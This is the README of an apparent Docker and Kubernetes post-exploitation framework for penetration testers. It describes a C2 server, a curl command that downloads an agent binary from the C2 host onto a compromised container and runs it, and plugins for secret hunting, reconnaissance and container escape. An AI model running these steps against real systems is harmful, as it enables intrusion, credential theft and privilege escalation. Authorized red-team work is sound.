Authors: Emmanuel Law , Rohit Pitke
Website: https://dockerexploitationframework.github.io
Docker exploitation framework is a post exploitation aid tool developed for penetration testers and red teamers. Tool leverages client-server architecture and provides a support for adding custom plugins for reconnaissance, persistance and lateral movement in compromised docker container environment(tested on standalone and Kubernetes environment). Please visit our website to know more
Server installation of this tool requires Python (reasonably latest)version to be installed on publicly facing VM/machine. This is our C2 (command and control in traditional red teaming world). Clone this repository and cd into the installation directory and start the server
sh start_c2.sh
This should start C2 server. Record the IP address and port (default to 9000)
Since this is a post exploitation toolkit, we are assuming you have a shell access to a compromised docker container. This could be in any dockerized environment like Kubernetes or standalone container.Run the following command to pull the agent binary onto container.
curl <C2_host:C2_port>/agent/download > agent
We have built our agent into native binary, thus elimnating a need of other interpreters/compilers. Above command will download agent binary and save as agent. Run the agent binary as
./agent --c2url <C2_URL>
Running above command will register the agent to C2 and rest of operation can you execute in command and control fashion from C2 UI itself.
Core of this toolkit is plugin architecture where you can develop any plugin, and push it via C2 to agents (compromised containers) for variety of purposes. We have following plugins already developed and available
Plugin | Purpose |
---|---|
Secret Scavenger | Find secrets on remote registry container images |
Uber Shell | Automatically provision the container with the necessary cli on demand |
Kube Audit Integration | Reconn the K8 cluster |
Container Escape | Automate privilege escalation by common container breakouts |
Necessary utilities are already built and developing your own plugin is straightforward. All plugins have their core logic and impplement UDP socket connection to communicate to agent. Please refer to one of the plugin in plugins directory to understand the logic. Utility classes are available in DEFAgent
module and it covers communication between your plugin and agent. We will soon extend user manual for plugin development
MIT
Free Software, Hell Yeah!